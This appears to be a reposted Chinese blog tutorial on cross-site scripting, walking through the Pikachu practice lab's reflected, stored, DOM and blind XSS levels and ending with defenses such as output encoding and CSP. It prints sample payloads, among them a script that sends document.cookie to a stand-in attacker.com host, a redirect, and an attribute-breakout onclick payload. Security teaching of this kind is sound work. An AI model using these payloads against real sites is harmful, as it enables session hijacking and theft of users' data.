自学内容网 自学内容网

Cross-Site Scripting(XSS)攻击

简介 

XSS(跨站脚本攻击)是一种常见的 Web 安全漏洞,攻击者通过在目标网站的输入框中注入恶意脚本,当其他用户(如管理员)查看包含恶意脚本的页面时,脚本会在他们的浏览器中执行。XSS 攻击可以分为以下几种类型:

  • 存储型 XSS:恶意脚本被存储在服务器的数据库或文件中,当其他用户访问包含恶意脚本的页面时,脚本会被执行。

  • 反射型 XSS:恶意脚本通过 URL 参数或表单提交被反射回用户浏览器,当用户访问包含恶意脚本的页面时,脚本会被执行。

  • DOM 型 XSS:恶意脚本通过修改页面的 DOM 结构,注入恶意脚本,当页面加载时,恶意脚本会被执行。

XSS 攻击步骤

1 识别漏洞

攻击者首先需要识别目标网站中存在 XSS 漏洞的输入点,例如:

  • 评论框

  • 反馈表单

  • 搜索框

  • URL 参数

2 注入恶意脚本

攻击者在识别的输入点中注入恶意脚本。常见的恶意脚本包括:

  • 弹出警告框<script>alert('XSS');</script>

  • 窃取 Cookie<script>document.location='http://attacker.com/steal?cookie='+document.cookie;</script>

  • 重定向<script>window.location='http://attacker.com';</script>

  • 修改页面内容<script>document.body.innerHTML='<h1>Hacked!</h1>';</script>

3 触发脚本执行

攻击者需要诱导其他用户(如管理员)访问包含恶意脚本的页面,从而触发脚本执行。常见的触发方式包括:

  • 钓鱼链接:攻击者发送包含恶意脚本的钓鱼链接,诱导用户点击。

  • 社交工程:攻击者通过社交工程手段,诱导用户访问包含恶意脚本的页面。

4 获取敏感信息

如果恶意脚本成功执行,攻击者可以获取用户的敏感信息,例如:

  • Cookie:通过窃取 Cookie,攻击者可以冒充用户身份,访问受保护的资源。

  • 会话令牌:通过窃取会话令牌,攻击者可以劫持用户的会话。

  • 其他敏感信息:攻击者可以通过恶意脚本获取用户的其他敏感信息,如用户名、密码等。

下面介绍pikachu靶场的Cross-Site Scripting(XSS)的通关

XSS类型

1.反射型(get)

看到题目表单输入就要考虑是否有xss漏洞

  • 构造payload尝试:发现我们的输入收到限制,属于前端的限制

  • 查看代码尝试修改使得能够输入 

 

  • 对限制长度做出修改

 

  • 修改之后提交设置好的payload发现能够执行了,说明存在漏洞 

 


 2.反射型(POST)

使用已经爆破的用户和密码进行登入发现和上一关是一样的了

 

  • 构造payload后发现也能执行弹框 

 

  • POST与get方法不同的在于post方式提交表单时在URL不会显示,而get方式提交会在URL中显示提交的信息 

 3.存储型XSS

  • 看到时留言板也要想到XSS漏洞,尝试构造payload提交发现能执行,并且发现提交的信息已经进行了存储,当重新进入这个页面时依然会触发弹窗。

 


4.DOM型 XSS

  • 看到表单也是先尝试构造payload提交看看是否有变化 

 

  • 没有任何发现 
  • 查看源代码

 

  • 看到输入框中的内容就是代码中的str,可以尝试在这里构造一个闭合,实现弹窗
  • 重新设置payload: 'οnclick="alert("FF")" ,提交之后点击下面的提示文字发现实现了弹框。

 

 


5.DOM型XSS-X 

  • 与上一关类似,不同的是可以观察到提交的信息可以在URL的text看到,所以也是构造闭合payload后点击下方文字即可

看到弹窗 

 


 6.XSS之盲打

看到题目得输入框首先先随便输入脚本看看有何反应

 

 

  • 当点击提交之后发现没有任何有用的改变,url也没有变化
  • 之后再查看页面的源代码,只能发现post方法提交了输入的东西

 

  • 前端的代码看不出什么问题,尝试登入后台查看有没有什么发现,不知道后台的url,所以可以使用kali的dirb去爆破目录 
  • 登录后发现刚才提交的弹窗已经显示了 

 

  • 并且刚才构造的两个payload已经成功上传 

 


防范措施

为了防范 XSS 攻击,可以采取以下措施:

1 输入验证和过滤

  • 输入验证:对用户输入进行严格的验证,确保输入符合预期的格式和内容。

  • 输出编码:在将用户输入显示到页面上时,进行适当的编码(如 HTML 编码),防止恶意脚本执行。

2 Content Security Policy (CSP)

  • CSP:设置 Content Security Policy,限制页面中可以执行的脚本来源,防止外部脚本的执行。

3 安全头设置

  • X-XSS-Protection:启用浏览器内置的 XSS 过滤器,防止简单的 XSS 攻击。

  • X-Content-Type-Options:防止 MIME 类型嗅探,确保浏览器正确解析内容类型。

4 定期安全审计

  • 代码审查:定期进行代码审查,确保没有潜在的 XSS 漏洞。

  • 安全测试:使用自动化工具和手动测试方法,进行安全测试,如渗透测试、模糊测试等。

5 使用安全的库和框架

  • 使用安全的库和框架:使用经过验证的安全库和框架,避免使用过时或不安全的组件。

 先到这里吧!!!


原文地址:https://blog.csdn.net/FFNCL/article/details/143908125

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!